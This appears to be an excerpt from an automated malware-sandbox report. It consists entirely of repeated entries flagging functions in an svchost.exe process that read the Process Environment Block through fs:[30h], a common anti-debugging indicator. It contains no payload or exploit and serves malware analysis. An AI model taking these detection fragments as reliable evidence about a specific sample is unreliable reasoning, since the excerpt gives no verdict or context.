          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330625D mov eax, dword ptr fs:[00000030h]1_2_0330625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h]1_2_033062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]1_2_03236154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]1_2_03270185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]1_2_033061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]1_2_032601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]1_2_0322A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]1_2_0322C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]1_2_032C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]1_2_032B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032280A0 mov eax, dword ptr fs:[00000030h]1_2_032280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]1_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]1_2_032AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]1_2_0326C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]1_2_03230710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]1_2_03260710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]1_2_03238770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]1_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]1_2_03230750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]1_2_032BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]1_2_032B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]1_2_032307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]1_2_032E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]1_2_032D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]1_2_032BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]1_2_0323C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]1_2_032B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]1_2_0324E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]1_2_03266620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]1_2_03268620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]1_2_0323262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]1_2_032AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]1_2_03272619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]1_2_03262674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]1_2_0324C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]1_2_0326C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]1_2_032666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0326A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]1_2_0326A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]1_2_032C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]1_2_03232582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]1_2_03232582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]1_2_03264588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]1_2_0326E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]1_2_032325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]1_2_032365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
